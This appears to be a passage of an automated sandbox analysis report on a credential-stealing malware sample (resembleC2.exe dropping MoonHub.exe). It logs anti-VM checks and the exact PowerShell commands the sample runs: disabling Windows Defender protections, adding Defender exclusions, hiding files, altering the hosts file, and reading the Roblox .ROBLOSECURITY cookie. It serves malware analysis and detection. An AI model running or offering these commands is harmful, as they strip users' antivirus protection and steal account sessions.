                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeWindow / User API: threadDelayed 5210Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeWindow / User API: threadDelayed 4632Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7083
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2622
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2642
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 752
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5227
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1069
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4818
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1836
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1537
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2525
                            Source: C:\Users\user\Desktop\resembleC2.exe TID: 2924Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe TID: 5968Thread sleep count: 292 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe TID: 6468Thread sleep count: 204 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe TID: 4580Thread sleep count: 61 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -597875s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -597766s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -597641s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -597531s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -597422s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -597311s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -597203s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -597094s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -596981s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -596870s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -596485s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -596281s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -596166s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -596062s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -595943s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -595813s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -595703s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -595593s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -595484s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -595375s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -595266s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -595156s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -595045s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -594938s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -594813s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -594688s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -594578s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -594469s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -594344s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -594232s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -594125s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -594016s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -593906s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -593795s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -593670s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -593562s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -593453s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -593340s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -593234s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -593125s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -593014s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -592906s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -592792s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -592684s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -592578s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -592466s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -592359s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe TID: 6400Thread sleep time: -592250s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2260Thread sleep count: 7083 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2260Thread sleep count: 2622 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep time: -4611686018427385s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4720Thread sleep count: 2642 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5280Thread sleep count: 752 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1248Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1372Thread sleep count: 5227 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1964Thread sleep count: 1069 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep count: 4818 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416Thread sleep count: 1836 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1524Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep count: 1537 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep count: 2525 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Users\user\Desktop\resembleC2.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597875Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597766Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597641Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597531Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597422Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597311Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597203Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 597094Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596981Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596870Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596485Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596281Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596166Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 596062Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595943Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595813Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595703Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595593Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595484Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595375Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595266Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595156Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 595045Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594938Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594813Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594688Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594578Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594469Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594344Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594232Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594125Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 594016Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593906Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593795Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593670Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593562Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593453Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593340Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593234Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593125Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 593014Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592906Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592792Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592684Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592578Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592466Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592359Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeThread delayed: delay time: 592250Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A435000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drBinary or memory string: vboxtray
                            Source: gqnbO.scr.5.drBinary or memory string: vboxservice
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A435000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drBinary or memory string: qemu-ga
                            Source: gqnbO.scr.5.drBinary or memory string: vmwareuser
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A435000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drBinary or memory string: vmusrvc
                            Source: gqnbO.scr.5.drBinary or memory string: vmwareservice+discordtokenprotector
                            Source: gqnbO.scr.5.drBinary or memory string: vmsrvc
                            Source: gqnbO.scr.5.drBinary or memory string: vmtoolsd
                            Source: gqnbO.scr.5.drBinary or memory string: vmwaretray
                            Source: resembleC2.exe, 00000000.00000002.2183248209.000000000119E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A435000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareservice
                            Source: 6z2guuz0ldkdgc1o.exe, 00000002.00000002.3375654871.000000001D2B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWrsio%SystemRoot%\system32\mswsock.dllon="false" allowDefinition="MachineToApplication" />
                            Source: MoonHub.exe, 00000005.00000002.2896371873.00000156587A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\resembleC2.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe'
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe'Jump to behavior
                            Modifies Windows Defender protection settings
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                            Modifies the hosts file
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess created: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe "C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess created: C:\Users\user\AppData\Local\Temp\MoonHub.exe "C:\Users\user\AppData\Local\Temp\MoonHub.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\MoonHub.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe'Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
